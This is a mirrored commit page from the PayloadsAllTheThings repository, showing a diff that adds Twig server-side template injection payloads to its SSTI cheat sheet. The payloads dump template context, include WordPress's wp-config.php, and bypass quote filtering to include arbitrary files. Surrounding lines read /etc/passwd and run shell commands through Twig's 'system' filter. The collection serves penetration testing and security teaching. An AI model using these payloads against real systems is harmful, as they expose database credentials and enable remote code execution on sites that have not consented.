Mirrors/PayloadsAllTheThings
6
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings synced 2024-07-05 18:01:35 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Merge pull request #517 from svewa/master

Browse Source 
Twig in Wordpress
This commit is contained in:
Swissky 2022-07-24 13:22:24 +02:00 committed by GitHub
commit 83c4658ff8
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 8 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
Server Side Template Injection/README.md
View File

@ -775,6 +775,7 @@ Execute code using SSTI for Slim engine.
{{7*7}}
{{7*'7'}} would result in 49
{{dump(app)}}
{{dump(_context)}}
{{app.request.server.all|join(',')}}
```
@ -796,6 +797,7 @@ $output = $twig > render (
```python
"{{'/etc/passwd'|file_excerpt(1,30)}}"@
{{include("wp-config.php")}}
```
### Twig - Code execution
@ -809,6 +811,12 @@ $output = $twig > render (
{{['cat$IFS/etc/passwd']|filter('system')}}
```
Example injecting values to avoid using quotes for the filename (specify via OFFSET and LENGTH where the payload FILENAME is)
```python
FILENAME{% set var = dump(_context)[OFFSET:LENGTH] %} {{ include(var) }}
```
Example with an email passing FILTER_VALIDATE_EMAIL PHP.
```powershell